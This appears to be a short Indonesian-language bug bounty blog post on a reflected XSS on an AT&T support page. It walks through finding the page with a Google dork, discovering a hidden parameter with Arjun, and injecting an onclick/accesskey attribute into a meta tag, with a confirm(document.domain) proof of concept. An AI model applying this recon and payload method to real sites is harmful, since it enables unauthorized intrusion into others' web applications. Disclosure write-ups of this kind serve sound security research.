Reflected XSS on AT&T


Yang pertama saya menggunakan google dork dibawah ini

site:att.com ext:jsp

Dan saya mendapatkan URL:

https://www.att.com/esupport/serviceInterstitial.jsp

Saya mulai menggunakan Arjun untuk mencari parameter tersembunyi pada halaman tersebut

Dan saya menemukan salah satu parameter unik karena value dari parameter tersebut tidak didalam kutipan ganda (“) tetapi di dalam "
Request:

Response:

  • <meta name=&quot;WT.mc_id&quot; content=&quot;test&quot;>

Lalu saya mencoba membuat atribut HTML baru dengan menambah spasi,
Request:

Response:

  • <meta name=&quot;WT.mc_id&quot; content=&quot;test id=x&quot;>

Next step,

Request:

Response:

  • <meta name=&quot;WT.mc_id&quot; content=&quot;x onclick=confirm(document.domain) accesskey=x &quot;>

🔥🔥🔥


Leave a Reply

Your email address will not be published. Required fields are marked *